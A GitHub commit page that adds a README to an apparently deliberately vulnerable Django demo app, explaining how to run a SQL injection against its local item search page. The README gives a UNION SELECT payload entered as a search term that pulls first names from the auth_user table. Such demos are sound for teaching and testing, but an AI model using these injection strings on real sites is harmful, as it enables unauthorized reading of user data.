We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 54aede7 commit c26463cCopy full SHA for c26463c
orders/README.md
@@ -0,0 +1,10 @@
1
+How to perform a SQL Injection Attack
2
+
3
+Steps
4
5
+- pip install Django
6
+- python manage.py runsever
7
+- http://127.0.0.1:8000/items/search
8
+- SELECT name FROM orders_item WHERE name LIKE '%' UNION SELECT first_name FROM auth_user WHERE first_name LIKE '%'
9
+- Search for "z' UNION SELECT first_name FROM auth_user WHERE first_name LIKE '"
10
0 commit comments